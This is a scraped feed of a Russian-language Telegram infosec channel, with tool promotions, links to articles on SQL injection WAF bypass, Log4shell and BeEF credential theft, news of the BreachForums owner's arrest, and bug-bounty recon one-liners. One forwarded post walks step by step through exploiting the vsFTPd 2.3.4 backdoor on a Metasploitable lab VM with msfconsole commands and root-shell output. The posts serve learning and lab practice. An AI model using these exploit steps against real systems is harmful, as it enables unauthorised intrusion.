Fsecurity | HH
2.06K subscribers
1.74K photos
105 videos
62 files
6.19K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Хотел бы узнать ваше мнение 👾
Идея ролика: Beef-xss как могут взломать через ссылку
Anonymous Poll
86%
Нормальная
9%
Такое
5%
Не очень
😈 Netcat для пентестера

Сегодня в этой статье мы рассмотрим одну из наиболее часто используемых сетевых утилит и узнаем, как другие фреймворки используют Netcat для создания сеанса.

https://telegra.ph/Netcat-dlya-pentestera-03-01

#netcat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Kali Linux
👣 Zmap-ProxyScanner - быстрый способ поиска прокси. Поможет найти 2000-5000 рабочих http, socks4, socks5 прокси за одно сканирование.

⚙️ GitHub

#github #soft #Go

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from PAINtest
Последние три дня багхантил и собрал несколько полезных однострочников для рекона и поиска базовых уязвимостей.

Для поиска поддоменов:
curl -s "https://crt.sh/?q=*DOMAIN*&output=json" | jq -r '.[].common_name' | sed 's/\*//g' | sort -u

Извлекаем все URL-ы из APK-файла:
apktool d base.apk -o baseAPK -f; grep -Phro "(https?://)[\w\,-/]+[\"\']" baseAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl" 

Проверка корректности CORS:
curl -s -I -H "Origin: yourdomain.com" -H "Access-Control-Request-Method: GET" -H "Access-Control-Request-Headers: X-Requested-With" -X OPTIONS https://example.com

А затем обнаружил, что существует репозиторий, содержащий не один десяток подобных полезных скриптов, пользуйтесь на здоровье :)

https://github.com/dwisiswant0/awesome-oneliner-bugbounty

#bugbounty #bugbountytips #recon #tools
🤔1
😈 Обход WAF для выполнения продвинутой SQL инъекции на основе ошибок

Полный дамп базы данных и получения данных пользователей с помощью Error Based SQL и обхода защиты веб приложения.

https://telegra.ph/Obhod-WAF-dlya-vypolneniya-prodvinutoj-SQL-inekcii-na-osnove-oshibok-03-12

#Web #SQL | 💀 Этичный хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
log4shell.gif
5.1 KB
😈 Log4shell в Google

В статье представлен поиск однажды нашумевшей уязвимости Log4shell на одном из сервисов Google.

https://telegra.ph/Log4shell-v-Google-03-14

#Web #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
😈 SQLmap: пентест БД

В статье представлен полный гайд по тестированию на проникновение базы данных с помощью инструмента sqlmap.

https://telegra.ph/Testirovanie-na-proniknovenie-v-bazu-dannyh-s-ispolzovaniem-SQLmap-03-16

#Web #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
В США арестовали владельца популярного киберпреступного портала BreachForums

Правоохранительные органы США арестовали 15 марта жителя Нью-Йорка, предположительно Помпомпурина, владельца хакерского форума BreachForums. Согласно судебным документам , ему было предъявлено обвинение в сговоре с целью склонения физических лиц к продаже устройств несанкционированного доступа.

По данным сотрудников ФБР, во время ареста подсудимый признался, что его настоящее имя Коннор Брайан Фитцпатрик, и что он — Помпомпурин, владелец форума киберпреступного форума BreachForums.

16 марта Фитцпатрик был освобожден под залог в размере 300 тысяч долларов. Он предстанет перед Окружным судом Восточного округа Вирджинии 24 марта. Помпомпурин сдал свои документы, сейчас ему разрешено перемещаться только в пределах Южного и Восточного округов Нью-Йорка и Восточного округа Вирджинии. Ему также запрещено контактировать со свидетелями, сообвиняемыми или сообщниками.

Один из администраторов BreachForums уже заявил, что сайт продолжит работать в штатном режиме несмотря на ситуацию с Помпомпурином. По его словам, полный доступ к инфраструктуре сайта есть не только у его владельца, но и у остальных администраторов.

Помпомпурин был известным игроком в киберпреступном подполье, занимающимся взломом компаний, а также сливом и продажей украденных данных через форумы и социальные сети. Он также был известным участником киберпреступного форума RaidForums, захваченным ФБР в 2022 году.

Именно после деактивации RaidForums Фитцпатрик создал портал BreachForums, который очень быстро стал крупнейшим в своем роде форумом по утечке данных. Портал активно используется хакерами и бандами вымогателей для слива и продажи украденных данных. В одном только марте мы писали о сливе данных одного из крупнейших немецких банков , а также о массивной 160 гигабайтной утечке внутренней информации Acer.
Forwarded from Kali Linux
⚜️ Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.

#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

💣Exploit

И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)


И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
😈 Hakrawler - быстрый CLI веб-сканер для хакеров

В этой статье рассмотрим инструмент, являющимся быстрым веб-сканер golang для сбора URL-адресов и местоположений файлов JavaScript.

https://telegra.ph/Hakrawler---bystryj-CLI-veb-skaner-dlya-hakerov-03-21

#Web #CLI
Forwarded from RESOLUTE ATTACK
This media is not supported in your browser
VIEW IN TELEGRAM
⚡️ ТОП РАСШИРЕНИЙ ДЛЯ BURP SUITE

Active Scan++
HTTP Request Smuggler
JSON Beautifier
Sitemap Extractor
Param-Miner
JSON Web Tokens
Autorize
Retire-JS
Param Miner
BurpJSLinkFinder
BurpBounty
domain_hunter
Turbo Intruder

RESOLUTE ATTACK
#Разное #BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Social Engineering
👾 Уязвимости online. Полезные ресурсы и базы данных для поиска уязвимостей.

• Хакеры начинают искать уязвимые эндпоинты уже через 15 минут, после раскрытия данных о CVE. Дело в том, что они постоянно мониторят сообщения от поставщиков и производителей ПО в поисках объявлений о новых уязвимостях, которые можно было бы использовать для начального доступа к корпоративной сети или удаленного выполнения кода.

🖖🏻 Приветствую тебя user_name.

• Часто нужно узнать всю информацию о какой-нибудь уязвимости: насколько найденный баг критичен, есть ли готовые сплоиты, какие вендоры уже выпустили патчи, каким сканером проверить наличие бага в системе и т.д. Для этих потребностей есть не мало инструментов и *ресурсов, о которых ты сегодня узнаешь:

MITRE CVE — база данных, поисковик и классификатор уязвимостей.
opencve.io — поисковик CVE с функционалом оповещений о новых угрозах.
Vulnerability Database — ресурс для поиска информации об актуальных угрозах.
sploitus — поисковик по эксплойтам и необходимым инструментам инструментам.
CVE Trends — ресурс, который отслеживает популярность CVE в реальном времени.
GitHub Advisory Database — БД уязвимостей, включающая CVE и рекомендации по безопасности.
Exploit DB — CVE-совместимый архив общедоступных эксплойтов и уязвимого программного обеспечения.
Cloudvulndb — проект, который аккумулирует уязвимости и проблемы безопасности поставщиков облачных услуг.
CVEDetails, osv.dev, VulDB, maltiverse — источники данных об уязвимостях и индикаторах компрометации.
security.snyk.io и Mend Vulnerability Database, Vulncode-DB — БД уязвимостей с открытым исходным кодом.
Rapid7 - DB — база данных, которая содержит детали более чем 180 тыс. уязвимостей и 4 тыс. эксплойтов. Все эксплойты включены в Metasploit.

*Список ресурсов не претендует на полноту.

S.E. ▪️ S.E.Relax ▪️ infosec.work
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥1
Forwarded from Kali Linux
⚜️ ZAP Сканнер уязвимостей

Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.

#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.


Почему бы мне не использовать Burp Suite?

Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.

#Преимущества OWASP ZAP?

Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.


#Установка

OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.

Скачайте и установите с официального сайта: https://www.zaproxy.org/download/

#Автоматичесское сканирование

Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.

ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.

#Ручное сканирование

Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.

На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Kali Linux
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки

Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер


⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
😈 Руководство по фреймворку для взлома BEeF

В этой статье будем применять как взлом BEeF, так и социальную инженерию для кражи учетных данных из браузера нашей цели.

https://telegra.ph/Rukovodstvo-po-frejmvorku-dlya-vzloma-BEeF-04-11

#BEeF | 💀 Этичный хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1